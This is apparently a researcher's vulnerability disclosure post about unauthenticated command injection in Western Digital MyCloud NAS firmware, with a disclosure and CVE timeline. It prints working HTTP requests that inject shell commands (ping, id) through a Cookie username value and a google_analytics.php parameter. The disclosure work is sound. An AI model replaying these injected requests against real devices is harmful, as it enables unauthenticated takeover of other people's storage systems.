Command Injection vulnerability in Western Digital MyCloud NAS

The software version of my device is 2.11.142 and my device says that it’s up to date.

The first command injection vulnerability is in the home page URL, “/” in index.php Cookie. To detect successful exploitation I started Wireshark and watched for the pings sent to my IP address from the device.

The request:

GET / HTTP/1.1
Host: wdmycloudex2
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 192.168.1.153`; local_login=1

I deleted the PHPSESSID from the cookie and it still worked without any authentication.

The next one was in the /web/google_analytics.php URL.

POST /web/google_analytics.php HTTP/1.1
Host: wdmycloudex2
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://wdmycloudex2/
Content-Length: 52
Cookie: isAdmin=1; username=admin; username=admin; local_login=1; fw_version=2.11.142
Connection: close
cmd=set&opt=cloud-device-num&arg=0|echo%20`id`%20%23

I was also able to exploit this one unauthenticated on the LAN by deleting the PHPSESSID from the cookie and replaying the request from a different computer.

I submitted the vulnerabilities to Western Digital on 10/8/2016 and received word that they released a firmware update to remediate on 12/13/2016. These vulnerabilities have been submitted to Mitre for CVE assignment.

Update 1/3/2017: Mitre assigned CVE’s CVE-2016-10107 and CVE-2016-10108.

Update 1/10/2017: I received two new emails from Western Digital after the one they sent on 12/13/2016 telling me they released a firmware patch. They only patched 2016-10108.

On 12/29/2016:

On 1/9/2017:

(Visited 1,271 times, 1 visits today)

3 thoughts on “Command Injection vulnerability in Western Digital MyCloud NAS”

Leave a Reply

Your email address will not be published. Required fields are marked *